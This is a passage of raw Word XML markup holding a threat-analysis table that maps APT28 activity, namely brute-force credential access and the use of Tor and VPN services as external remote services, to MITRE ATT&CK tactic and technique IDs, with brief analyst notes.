                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT28</w:t>
            </w:r>
            <w:r w:rsidR="00632139">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="43EEE3DE" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3EA8A320" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6686D68B" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5DE17D1E" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2E89D3F2" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="002D1D50" w14:paraId="48856170" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDFB6B2" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A70CD91" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="248AF3BE" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01B57F1E" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ADA5321" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14B3D96F" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A92388" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DC4F8B1" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="002D1D50" w14:paraId="2E045A35" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FF7D5F0" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D72045" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54FDC6DD" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26C2F749" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20956DAF" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D94F7" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B6878A8" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E9B652" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w14:paraId="452EBE4C" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="105C9590" w14:textId="1AF0BBF7" w:rsidR="005A6AAC" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE2736D" w14:textId="057C79D4" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="00155B94" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C730CB0" w14:textId="2AD3A42A" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A6AAC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005A6AAC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1110 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005A6AAC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14BAB1F4" w14:textId="144DAF5C" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59499469" w14:textId="77777777" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CF77E0" w14:textId="0DE1651D" w:rsidR="005A6AAC" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1036D69F" w14:textId="25FEFF02" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="001960FB" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B780986" w14:textId="102412A7" w:rsidR="005A6AAC" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:r w:rsidRPr="005A6AAC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>brute force capability allows the actors to access protected data,</w:t>
            </w:r>
            <w:r w:rsidR="003D27B3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">including email, and </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>identify valid account credentials</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6696505A" w14:textId="77777777" w:rsidR="00775E27" w:rsidRDefault="00775E27" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22D44A2F" w14:textId="2DC900AD" w:rsidR="00775E27" w:rsidRPr="00775E27" w:rsidRDefault="00775E27" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Info </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>w.r</w:t>
            </w:r>
            <w:r w:rsidR="00483E24">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>t.</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> this attack scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w14:paraId="72C9BD6E" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638A501F" w14:textId="42746C09" w:rsidR="005A6AAC" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3095C5" w14:textId="69C835D9" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">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7EEE7E9B" w14:textId="7B7FA865" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1133 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> External Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E7BEA8F" w14:textId="41D637FE" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E2394F" w14:textId="77777777" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBD3883" w14:textId="07617BC7" w:rsidR="005A6AAC" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752D9E87" w14:textId="1B09C19D" w:rsidR="005A6AAC" w:rsidRPr="00B857D7" w:rsidRDefault="001960FB" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70B09AB7" w14:textId="77777777" w:rsidR="005A6AAC" w:rsidRDefault="00D81EFA" w:rsidP="00151FAB">
            <w:r>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="00D81EFA">
              <w:t>APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6A3AA2" w14:textId="77777777" w:rsidR="00775E27" w:rsidRDefault="00775E27" w:rsidP="00151FAB"/>
          <w:p w14:paraId="72278FEF" w14:textId="672B479C" w:rsidR="00775E27" w:rsidRPr="00D81EFA" w:rsidRDefault="00775E27" w:rsidP="00151FAB">
            <w:r>
              <w:t>Info w.r.t to this attack scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F175E" w:rsidRPr="00B857D7" w14:paraId="7F218C0F" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CE8EF0" w14:textId="45071F66" w:rsidR="001F175E" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
